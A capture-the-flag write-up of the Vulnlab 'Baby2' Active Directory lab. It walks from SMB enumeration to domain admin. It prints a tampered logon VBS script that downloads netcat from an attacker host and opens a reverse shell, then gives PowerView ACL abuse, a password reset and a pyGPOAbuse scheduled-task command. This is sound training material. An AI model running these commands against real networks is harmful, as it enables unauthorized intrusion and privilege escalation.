Vulnlab — Baby2

ARZ101
5 min readSep 9, 2023

Baby2, a medium rated machine involved enumerating smb shares to find a logon script, having the credentials, this script can be modified to get a shell as Amelia , who belongs to a group that had WriteDACL on Gpoadm , granting full control over gpoadm and changing the account’s password, having GenericAll on GPO, through pyGPOAbuse creating a scheduled task to get administrator.

PORT      STATE SERVICE      VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-08 10:27:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Issuer: commonName=baby2-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T17:39:15
| Not valid after: 2024-08-21T17:39:15
| MD5: 86833092b739d099392a9fba548ca41d
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
445/tcp open tcpwrapped
3269/tcp open tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Issuer: commonName=baby2-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T17:39:15
| Not valid after: 2024-08-21T17:39:15
| MD5: 86833092b739d099392a9fba548ca41d
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=dc.baby2.vl

Enumerating smb shares with null authentication

From homes share, we can find some directories for users

Also from apps share there's login.vbs.lnk

With kerbrute we can verify these users also check if pre-authentication is disabled for AS-REP roasting

From NETLOGON there’s the login.vbs

Foothold (Amelia)

From the users, there’s library which seems odd, on trying to login with the password library it shows that's a valid login

This user has READ access on SYSVOL share

Also running bloodhound to enumerate domain

python3 /opt/BloodHound.py/bloodhound.py -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.105.23

This user didn’t had any ACLs but running the shortest path to high value targets , members of LEGACY group have WriteDacl on GPOADM which further has GenericAll on Group Policy Object (GPO)

But for now we need to focus on logon script, even tho from the output of crackmapexec, it showed that we only have READ access on SYSVOL but we can still overwrite the login.vbs file from scripts folder

Have responder or smbserver ready and upload the file

On responder, we’ll receive the NTLMv1 hash of Amelia

But I wasn’t able to crack this hash, instead we can just modify the vbs script to get a reverse shell

Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"

Check in which groups Amelia belongs to

Abusing GPO to gain administrator

This account is a member of legacy group, meaning that we can abuse WriteDACL on gpoadm, with PowerView granting GenericAll on GPOADM

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "GPOADM" -PrincipalIdentity "Amelia.Griffiths" -Verbose

Now we can change the password for gpoadm

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPassword

Using pyGPOAbuse, we can create an immediate scheduled task which will get executed as SYSTEM user to add gpoadm in local administrators group (for this I had to use python virtual environment as some dependencies were causing an issue with the current version of impacket), we’ll need the GPO ID for creating the task

python3 pygpoabuse.py baby2.vl/GPOADM:'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -f

Wait for few seconds for the created task to be executed, we’ll see gpoadm being a part of administrators group

Now we can login through WinRM

References

--

--